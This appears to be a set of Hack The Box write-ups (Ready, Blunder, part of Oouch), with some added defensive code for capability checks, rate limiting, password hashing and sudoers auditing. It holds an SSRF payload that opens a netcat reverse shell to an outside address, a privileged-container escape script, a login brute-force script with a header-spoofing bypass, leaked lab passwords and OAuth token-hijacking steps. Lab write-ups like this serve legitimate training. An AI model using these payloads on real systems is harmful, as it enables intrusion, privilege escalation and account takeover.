<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%2010%2E10%2E14%2E10%209001%20%2de%20%2fbin%2fbash%20%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf.git
</code></pre></div></div>
<p>And add it to the repository URL field.</p>
<ul>
<li>Before creating the project we need to start a listener to catch the shell</li>
</ul>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc <span class="nt">-lvnp</span> 9001
</code></pre></div></div>
<ul>
<li>Click Create</li>
</ul>
<p>We get a shell!</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>998<span class="o">(</span>git<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>990<span class="o">(</span>git<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>998<span class="o">(</span>git<span class="o">)</span>
</code></pre></div></div>
<h3 id="privilege-escalation">Privilege Escalation</h3>
<p>The shell we are in is inside a Docker container, so to get the user flag we will first need to get root in the container. After some enumeration we find an interesting file, /opt/backup/gitlab.rb:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat </span>gitlab.rb
...
<span class="c"># gitlab_rails['smtp_enable'] = true </span>
<span class="c"># gitlab_rails['smtp_address'] = "smtp.server" </span>
<span class="c"># gitlab_rails['smtp_port'] = 465 </span>
<span class="c"># gitlab_rails['smtp_user_name'] = "smtp user" </span>
gitlab_rails[<span class="s1">'smtp_password'</span><span class="o">]</span> <span class="o">=</span> <span class="s2">"wW59U!ZKMbG9+*#h"</span>
<span class="c"># gitlab_rails['smtp_domain'] = "example.com" </span>
<span class="c"># gitlab_rails['smtp_authentication'] = "login" </span>
<span class="c"># gitlab_rails['smtp_enable_starttls_auto'] = true </span>
<span class="c"># gitlab_rails['smtp_tls'] = false</span>
...
</code></pre></div></div>
<p>We can use this password to switch to root within the Docker container and grab the user flag.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>su
password: wW59U!ZKMbG9+<span class="k">*</span><span class="c">#h</span>
root@gitlab:/opt/backup# <span class="nb">cat</span> ~/user.txt
</code></pre></div></div>
<h3 id="getting-root">Getting Root</h3>
<p>The Docker container we are still in is a privileged container, meaning it was started with the <code>--privileged</code> flag.</p>
<p><a href="https://betterprogramming.pub/escaping-docker-privileged-containers-a7ae7d17f5a1">Privileged Containers</a>.</p>
<p>Following the article, we can write the bash script below, replacing your_id_rsa.pub with the contents of your own id_rsa.pub.</p>
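<p>How do you tell, from inside, that a container is privileged? The effective capability set is the first thing to look at: a <code>--privileged</code> container holds every capability, whereas a default Docker container holds a trimmed set without CAP_SYS_ADMIN. The following is an added audit helper (my code, not from the writeup or the linked article) that decodes the <code>CapEff</code> mask from <code>/proc/&lt;pid&gt;/status</code> and names what is beyond Docker's default; <code>SAMPLE_STATUS</code> is a constructed status fragment, and the "every capability" check is a heuristic since the highest capability number depends on the kernel.</p>

```python
#!/usr/bin/env python3
"""Decode a Linux CapEff mask and flag privileged-container indicators.

Added example, not from the writeup or the linked article. CapEff in
/proc/<pid>/status is the effective capability set as a hex bitmask. A
--privileged container runs with every capability, so CAP_SYS_ADMIN being
present is the first thing to check; Docker's default set (mask
00000000a80425fb) lacks it. SAMPLE_STATUS is a constructed fragment.
"""

# Capability bit numbers from include/uapi/linux/capability.h.
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]

DOCKER_DEFAULT_MASK = 0x00000000A80425FB  # Docker's default capability set


def parse_capeff(status_text):
    """Return the CapEff mask as an int from /proc/<pid>/status text."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split(":", 1)[1].strip(), 16)
    raise ValueError("no CapEff line found")


def cap_names(mask):
    """Names of the capabilities set in mask (unknown bits as CAP_<n>)."""
    names = []
    bit = 0
    while mask >> bit:
        if (mask >> bit) & 1:
            names.append(CAP_NAMES[bit] if bit < len(CAP_NAMES) else f"CAP_{bit}")
        bit += 1
    return names


def assess(mask):
    """Summarise what the mask implies about container privilege."""
    names = set(cap_names(mask))
    default = set(cap_names(DOCKER_DEFAULT_MASK))
    # Heuristic: a contiguous run of ones reaching at least bit 37 is the
    # shape of "all capabilities"; the exact top bit depends on the kernel.
    every_cap = (mask & (mask + 1)) == 0 and mask.bit_length() >= 38
    return {
        "has_sys_admin": "CAP_SYS_ADMIN" in names,
        "beyond_docker_default": sorted(names - default),
        "looks_like_every_cap": every_cap,
    }


def current_process_mask():
    """Read the calling process's own CapEff (Linux only)."""
    with open("/proc/self/status") as f:
        return parse_capeff(f.read())


# Constructed /proc/self/status fragment for a root shell with all
# capabilities up to bit 37 (what a --privileged container shows on a
# kernel without CAP_PERFMON and later). Not captured from the box.
SAMPLE_STATUS = """\
Name:\tbash
Uid:\t0\t0\t0\t0
CapInh:\t0000000000000000
CapPrm:\t0000003fffffffff
CapEff:\t0000003fffffffff
CapBnd:\t0000003fffffffff
"""

if __name__ == "__main__":
    for label, mask in (("sample", parse_capeff(SAMPLE_STATUS)),
                        ("docker default", DOCKER_DEFAULT_MASK)):
        print(label, hex(mask), assess(mask))
```

<p>Any workload whose effective set includes CAP_SYS_ADMIN should be treated as host-equivalent when assessing blast radius, and <code>--privileged</code> additionally drops the default seccomp profile and exposes the host's device nodes, so the capability mask is a lower bound on what the container can reach.</p>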
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mkdir</span> /tmp/JDMCE <span class="o">&&</span> mount <span class="nt">-t</span> cgroup <span class="nt">-o</span> rdma cgroup /tmp/JDMCE <span class="o">&&</span> <span class="nb">mkdir</span> /tmp/JDMCE/x
<span class="nb">echo </span>1 <span class="o">></span> /tmp/JDMCE/x/notify_on_release
<span class="nv">host_path</span><span class="o">=</span><span class="sb">`</span><span class="nb">sed</span> <span class="nt">-n</span> <span class="s1">'s/.*\perdir=\([^,]*\).*/\1/p'</span> /etc/mtab<span class="sb">`</span>
<span class="nb">echo</span> <span class="s2">"</span><span class="nv">$host_path</span><span class="s2">/cmd"</span> <span class="o">></span> /tmp/JDMCE/release_agent
<span class="nb">echo</span> <span class="s1">'#!/bin/sh'</span> <span class="o">></span> /cmd
<span class="nb">echo</span> <span class="s2">"echo 'your_id_rsa.pub' > /root/.ssh/authorized_keys"</span> <span class="o">>></span> /cmd
<span class="nb">chmod </span>a+x /cmd
sh <span class="nt">-c</span> <span class="s2">"echo </span><span class="se">\$\$</span><span class="s2"> > /tmp/JDMCE/x/cgroup.procs"</span>
</code></pre></div></div>
<p>We transfer the script to the target machine, make it executable and run it. The script adds our id_rsa.pub to the authorized_keys file on the host.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget http://10.10.14.2/exploit.sh
<span class="nb">chmod</span> +x exploit.sh
./exploit.sh
</code></pre></div></div>
<p>We can then SSH in and get the root flag.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ready:~# <span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
</code></pre></div></div>
<p>John McEwan. Ready is a medium difficulty machine on Hack the Box.</p>
<hr />
<h2 id="htb-blunder-writeup">[HTB] Blunder WriteUp</h2>
<p>Published 2020-10-17T13:00:00+01:00 at <a href="https://jdmce.com/hack%20the%20box/%5BHTB%5D-Blunder-Writeup">https://jdmce.com/hack%20the%20box/%5BHTB%5D-Blunder-Writeup</a>.</p>
<p><img src="https://jdmce.com/assets/blunder/blunder.jpg" alt="Blunder" /></p>
<p>Blunder is a fairly easy machine on Hack The Box. We bypass the brute-force mitigation to brute-force the CMS password, then use an image upload vulnerability to get access. Some enumeration then takes us to the second user, and from there to root.</p>
<p>As always, I begin by running an nmap scan:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-p-</span> <span class="nt">-oN</span> nmap/nmap 10.10.10.191
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Nmap 7.80 scan initiated Mon Jun 1 18:30:36 2020 as: nmap -sC -sV -p- -oN nmap/nmap 10.10.10.191</span>
Nmap scan report <span class="k">for </span>10.10.10.191
Host is up <span class="o">(</span>0.023s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Blunder | A blunder of interesting facts
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
<span class="c"># Nmap done at Mon Jun 1 18:35:55 2020 -- 1 IP address (1 host up) scanned in 319.13 seconds</span>
</code></pre></div></div>
<p>Only 2 ports show up in the scan, 80 and 21. The FTP server on port 21 refuses connections, so let’s look at the site running on port 80.</p>
<p><img src="https://jdmce.com/assets/blunder/website.jpg" alt="Website" /></p>
<p>The website is fairly simple; poking around, we don’t find much of any use. Next I run a dirbuster scan.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Mon Jun 01 19:05:18 BST 2020
--------------------------------
http://10.10.10.191:80
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/
/bl-themes/
/admin/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/stephen-king-0
/stadia
/about
/usb
/install.php
/robots.txt
/todo.txt
--------------------------------
</code></pre></div></div>
<p>Dirbuster finds a few interesting things! First a file called todo.txt:</p>
<pre><code class="language-txt">-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
</code></pre>
<p>This gives us a few clues: fergus must be a user, and the CMS has likely not been updated yet.</p>
<p>Navigating to /admin we find the login page for Bludit, the CMS being used.</p>
<p><img src="https://jdmce.com/assets/blunder/cms.jpg" alt="CMS" /></p>
<p>We already have a potential username (fergus) but no password. We can generate a wordlist based on the website content using cewl.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cewl 10.10.10.191 <span class="o">></span> wordlist.txt
</code></pre></div></div>
<p>From the page source code we can identify the version of Bludit which is running, 3.9.2. Googling for exploits relating to this version we find this <a href="https://rastating.github.io/bludit-brute-force-mitigation-bypass/">blog post</a>. We can then use the proof of concept with our wordlist to brute force the password for fergus. (Note that the section for generating 50 passwords is not needed, as we are using our own wordlist.)</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'admin'
# Candidate passwords come from the cewl wordlist, one per line
wordlist = open("wordlist.txt", "r")

# Generate 50 incorrect passwords
# for i in range(50):
#     wordlist.append('Password{i}'.format(i = i))

# Add the correct password to the end of the list
#wordlist.append('adminadmin')

for password in wordlist:
    password = password.strip()   # drop the trailing newline read from the file
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    print('[*] Trying: {p}'.format(p = password))
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }
    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }
    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
</code></pre></div></div>
<p>Running the exploit returns the password <code class="language-plaintext highlighter-rouge">RolandDeschain</code>. We can now log in as fergus!</p>
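<p>The bypass works because Bludit keys its login lockout on a header the client controls. The following is an added example, not Bludit’s code and not from the write-up: a login rate limiter in the weak shape (the client-supplied X-Forwarded-For wins) beside the hardened shape (the header is only honoured when the TCP peer is a trusted reverse proxy, and then only the rightmost address the proxy did not add itself). The proxy address in TRUSTED_PROXIES and the attacker address are assumptions for the simulation.</p>

```python
# Added example: a login rate limiter that does not trust a client-supplied
# X-Forwarded-For header. Not Bludit's code; TRUSTED_PROXIES is an assumed deployment detail.
import ipaddress
import time
from collections import defaultdict

MAX_ATTEMPTS = 10       # failed logins allowed per source per window
WINDOW_SECONDS = 300    # sliding window length

# Assumption: only this reverse proxy is allowed to set X-Forwarded-For.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def weak_client_key(remote_addr, headers):
    """The shape the bypass relies on: a header the client controls wins over the
    TCP peer address, so every request can present itself as a new client."""
    return headers.get("X-Forwarded-For", remote_addr)


def hardened_client_key(remote_addr, headers):
    """Honour X-Forwarded-For only when the TCP peer is a trusted proxy. Walk the
    chain from the right: the rightmost address that is not a trusted proxy is the
    one the proxy actually accepted a connection from; anything left of it was
    supplied by the client and is ignored."""
    peer = ipaddress.ip_address(remote_addr)
    if peer in TRUSTED_PROXIES:
        hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
        for hop in reversed(hops):
            try:
                addr = ipaddress.ip_address(hop)
            except ValueError:
                break               # garbage in the chain: stop trusting it, use the peer
            if addr not in TRUSTED_PROXIES:
                return str(addr)
    return str(peer)


class LoginLimiter:
    def __init__(self, key_func, now=time.time):
        self.key_func = key_func
        self.now = now
        self.failures = defaultdict(list)   # client key -> timestamps of failed logins

    def allowed(self, remote_addr, headers):
        key = self.key_func(remote_addr, headers)
        cutoff = self.now() - WINDOW_SECONDS
        self.failures[key] = [t for t in self.failures[key] if t > cutoff]
        return len(self.failures[key]) < MAX_ATTEMPTS

    def record_failure(self, remote_addr, headers):
        self.failures[self.key_func(remote_addr, headers)].append(self.now())


def simulate_guessing(key_func, attempts):
    """Replay `attempts` wrong passwords from one address that changes the
    X-Forwarded-For value on every request. Returns how many reached the password check."""
    limiter = LoginLimiter(key_func, now=lambda: 1000.0)   # frozen clock keeps it deterministic
    attacker = "203.0.113.7"                                 # constructed address (TEST-NET-3)
    reached = 0
    for i in range(attempts):
        headers = {"X-Forwarded-For": f"client-{i}"}        # rotates every request
        if limiter.allowed(attacker, headers):
            reached += 1
            limiter.record_failure(attacker, headers)
    return reached
```

<p>With the weak key every one of 50 rotated requests reaches the password check; with the hardened key the eleventh is refused. The same rule applies to any header a proxy might set (X-Real-IP, Forwarded): strip or overwrite it at the proxy, and never derive a security decision from it when the request did not arrive from that proxy.</p>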
<p><img src="https://jdmce.com/assets/blunder/loggedin.jpg" alt="Logged In" /></p>
<p>Bludit 3.9.2 has a vulnerability in its upload functionality, and there is a Metasploit module available.</p>
<p><img src="https://jdmce.com/assets/blunder/msf.jpg" alt="Metasploit" /></p>
<p>We supply the username, password and correct addresses and get a shell as www-data.</p>
<h3 id="privilege-escalation">Privilege Escalation</h3>
<p>After some time spent doing basic enumeration, we find the file /var/www/bludit-3.9.2/bl-content/databases/users.php:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp"><?php</span> <span class="nb">defined</span><span class="p">(</span><span class="s1">'BLUDIT'</span><span class="p">)</span> <span class="k">or</span> <span class="k">die</span><span class="p">(</span><span class="s1">'Bludit CMS.'</span><span class="p">);</span> <span class="cp">?></span>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
</code></pre></div></div>
<p>It contains a hashed password for both fergus and hugo (admin). The passwords are hashed using SHA-1, which is easily cracked using online tools. I used <a href="https://crackstation.net/">CrackStation</a>.</p>
<p>hugo:Password120</p>
<p>We can now log in as hugo and get user.txt!</p>
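<p>Why an online service answers a SHA-1 hash instantly, and what the CMS should have stored instead, as an added example that is not Bludit’s code and not part of the write-up. The candidate list is constructed, and the PBKDF2 iteration count is an assumption in line with current OWASP guidance.</p>

```python
# Added example (not Bludit's code): an unsalted SHA-1 hash of a dictionary word is a
# lookup-table key, while a salted, slow hash is not.
import hashlib
import hmac
import os


def sha1_hex(password):
    """Unsalted SHA-1 as hex: every user with this password gets the same value."""
    return hashlib.sha1(password.encode()).hexdigest()


# A constructed lookup table: SHA-1 of a few candidate passwords, the kind of
# precomputed index an online cracking service answers from.
CANDIDATES = ["password", "Password1", "letmein", "Password120"]
SHA1_TABLE = {sha1_hex(p): p for p in CANDIDATES}


def lookup_unsalted_sha1(digest_hex):
    """Return the plaintext if the digest is in the table, else None.
    No work is done per lookup; the cost was paid once when the table was built."""
    return SHA1_TABLE.get(digest_hex.lower())


# Assumption: work factor in line with current OWASP guidance for PBKDF2-HMAC-SHA256.
PBKDF2_ITERATIONS = 600_000


def hash_password(password):
    """Return 'iterations$salt_hex$dk_hex' using a fresh 16-byte random salt, so two
    users with the same password store different values and no table applies."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"{PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)
```

<p>Storing the iteration count beside the hash lets the work factor be raised later without invalidating existing records; verification reads the parameters from the record rather than from a global.</p>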
<h3 id="getting-root">Getting root</h3>
<p>As hugo, we see that we can run /bin/bash as any user other than root; however, the version of sudo is outdated, so this restriction can be bypassed to gain root:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> <span class="nt">-l</span>
Password: Password120
User hugo may run the following commands on Blunder:
<span class="o">(</span>All, <span class="o">!</span>root<span class="o">)</span> /bin/bash
</code></pre></div></div>
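<p>A quick way to find rules of this shape before an attacker does, as an added example that is not part of the write-up: a small sudoers parser that flags any Runas list which carves an exception out of ALL with <code class="language-plaintext highlighter-rouge">!</code>, the pattern this escalation relies on. An explicit allow-list of Runas users is the safer form. The sudoers excerpt is constructed and includes the rule seen on Blunder.</p>

```python
# Added example (not from the write-up): flag sudoers rules whose Runas list uses '!'
# to subtract an account from ALL, the pattern behind the (ALL, !root) escalation.
import re

# Constructed sudoers excerpt, including the rule seen on Blunder.
SUDOERS_SAMPLE = """\
# /etc/sudoers excerpt (constructed)
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
hugo    ALL=(ALL, !root) /bin/bash
deploy  ALL=(www-data) NOPASSWD: /usr/bin/systemctl restart app
%admin  ALL=(ALL) ALL
"""

# user  host=(runas_users[:runas_groups]) [tags:] commands
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<cmds>.*)$")


def parse_sudoers(text):
    """Return one dict per user specification; comments, blanks and Defaults are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append(m.groupdict())
    return rules


def risky_negated_runas(text):
    """Return (user, runas, cmds) for every rule whose Runas user list has a '!' entry."""
    findings = []
    for r in parse_sudoers(text):
        runas_users = [u.strip() for u in r["runas"].split(":")[0].split(",")]
        if any(u.startswith("!") for u in runas_users):
            findings.append((r["user"], r["runas"], r["cmds"]))
    return findings
```

<p>Run it over /etc/sudoers and the files under /etc/sudoers.d; a hit should be rewritten as a positive list of the accounts the command is meant to run as, and the sudo package itself kept current.</p>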
<p><img src="https://jdmce.com/assets/blunder/root.jpg" alt="Root" /></p>John McEwanBlunder is a fairly easy machine on Hack The box. We bypass the brute force mitigation to brute force the password to the CMS[HTB] Oouch WriteUp2020-08-01T13:00:00+01:002020-08-01T13:00:00+01:00https://jdmce.com/hack%20the%20box/%5BHTB%5D-Oouch-Writeup<p><img src="https://jdmce.com/assets/oouch/oouch.jpg" alt="Oouch" /></p>
<p>Oouch is a hard machine on Hack the Box. The foothold requires exploiting a misconfiguration in OAuth, and dbus is then exploited to gain root access.</p>
<p>I begin as always with an nmap scan.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Nmap 7.80 scan initiated Fri Jul 3 20:07:53 2020 as: nmap -sC -sV -oN scans/nmap 10.10.10.177
WARNING: Service 10.10.10.177:8000 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
Nmap scan report for 10.10.10.177
Host is up (0.030s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 49 Feb 11 19:34 project.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.53
| Logged in as ftp
| TYPE: ASCII
| Session bandwidth limit in byte/s is 30000
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:6b:a7:2b:7a:21:9f:21:11:37:11:ed:50:4f:c6:1e (RSA)
|_ 256 d2:af:55:5c:06:0b:60:db:9c:78:47:b5:ca:f4:f1:04 (ED25519)
5000/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
| http-title: Welcome to Oouch
|_Requested resource was http://10.10.10.177:5000/login?next=%2F
8000/tcp open rtsp
| fingerprint-strings:
| FourOhFourRequest, GetRequest, HTTPOptions:
| HTTP/1.0 400 Bad Request
| Content-Type: text/html
| Vary: Authorization
| <h1>Bad Request (400)</h1>
| RTSPRequest:
| RTSP/1.0 400 Bad Request
| Content-Type: text/html
| Vary: Authorization
| <h1>Bad Request (400)</h1>
| SIPOptions:
| SIP/2.0 400 Bad Request
| Content-Type: text/html
| Vary: Authorization
|_ <h1>Bad Request (400)</h1>
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 3 20:08:14 2020 -- 1 IP address (1 host up) scanned in 20.59 seconds
</code></pre></div></div>
<p>The FTP server allows for anonymous login. The banner says “qtc’s development server”, and it contains a single text file project.txt.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Flask -> Consumer
Django -> Authorization Server
</code></pre></div></div>
<p>There is an http server on port 5000 with a login page. I make an account and log in with credentials xaero:xaero.</p>
<p><img src="https://jdmce.com/assets/oouch/login1.jpg" alt="Login Page" /></p>
<p>After looking around the application I notice a few interesting points. The about page contains a subtle clue about how to exploit the application: "If you notice bugs inside the application or the authentication flow, please inform our system administrator." And the contact page has a message box which appears to send directly to an admin account. To test this I can send a link to my machine and listen with nc; I get a response from the server, which confirms that the server is processing these messages.</p>
<p><img src="https://jdmce.com/assets/oouch/contact.jpg" alt="Contact Page" /></p>
<p>Next I run dirbuster.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://10.10.10.177:5000/ <span class="nt">-w</span> /opt/SecLists/Discovery/Web-Content/big.txt
<span class="o">===============================================================</span>
Gobuster v3.0.1
by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> & Christian Mehlmauer <span class="o">(</span>@_FireFart_<span class="o">)</span>
<span class="o">===============================================================</span>
<span class="o">[</span>+] Url: http://10.10.10.177:5000/
<span class="o">[</span>+] Threads: 10
<span class="o">[</span>+] Wordlist: /opt/SecLists/Discovery/Web-Content/big.txt
<span class="o">[</span>+] Status codes: 200,204,301,302,307,401,403
<span class="o">[</span>+] User Agent: gobuster/3.0.1
<span class="o">[</span>+] Timeout: 10s
<span class="o">===============================================================</span>
2020/07/03 20:47:51 Starting gobuster
<span class="o">===============================================================</span>
/about <span class="o">(</span>Status: 302<span class="o">)</span>
/contact <span class="o">(</span>Status: 302<span class="o">)</span>
/documents <span class="o">(</span>Status: 302<span class="o">)</span>
/home <span class="o">(</span>Status: 302<span class="o">)</span>
/login <span class="o">(</span>Status: 200<span class="o">)</span>
/logout <span class="o">(</span>Status: 302<span class="o">)</span>
/oauth <span class="o">(</span>Status: 302<span class="o">)</span>
/profile <span class="o">(</span>Status: 302<span class="o">)</span>
/register <span class="o">(</span>Status: 200<span class="o">)</span>
<span class="o">===============================================================</span>
2020/07/03 20:49:23 Finished
<span class="o">===============================================================</span>
</code></pre></div></div>
<p>We get a /oauth page which gives us a new subdomain http://consumer.oouch.htb:5000/.
Logging in here takes us to another subdomain, http://authorization.oouch.htb:8000/.</p>
<p>Register on port 8000.</p>
<p>To exploit the authorization flow we need to extract the token-code before it is used, as it can only be used once. To do this, use Burp Suite and forward packets during the authorization until you reach the packet that contains the token-code, then copy the token and drop the packet.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET /oauth/connect/token?code=FdpuhkBq86DxiKLEsvwcZI2hgDC2ld HTTP/1.1
Host: consumer.oouch.htb:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://authorization.oouch.htb:8000/oauth/authorize/?client_id=UDBtC8HhZI18nJ53kJVJpXp4IIffRhKEXZ0fSd82&response_type=code&redirect_uri=http://consumer.oouch.htb:5000/oauth/connect/token&scope=read
Connection: close
Cookie: session=.eJxlj8FuAyEMRH-FcI4qwCyYfEXVHnqoosiASVbZZKtl9xTl3-u2x55GlufZMw99ahP1C3d9-HxotYroG_dOZ9Z7_ToxdVbTfFbjXa2zolJkqdbL2NWXeF708bn_z73xeezrQus439X79gu1bdqpD57KfGNFvMw7YY97CbBwv-jDumws01j1QWduQByThZitcxbBpJTIYIjmRzh5zmEYvIcIPlhTXS4JjDcuWyEx4kC1JI8mVWjFmhTIyTFHYABDQA9cRKutKDim2CrEGJJtWDJJhdKXdlrnK98lDzUvX9tA0GrJrQaPkBHJOB4GE2ICzA7QC7d1Xv5KOP38BnkSaI0.Xv-ZjQ.akKbed49LVvPMe5CbzI2QuO9eOE
Upgrade-Insecure-Requests: 1
</code></pre></div></div>
<p>Now that we have a token which has not yet been used, it can be redeemed by any user. So we send the link <code class="language-plaintext highlighter-rouge">http://consumer.oouch.htb:5000/oauth/connect/token?code=FdpuhkBq86DxiKLEsvwcZI2hgDC2ld</code> to the admin via the contact page; when the admin user “clicks” on the link, which we established earlier will happen, the token is linked to the admin’s account.</p>
<p>After the link is clicked we can log in again via port 8000 and we will be logged in as the user that is linked to our authorization account, which is now the user qtc.</p>
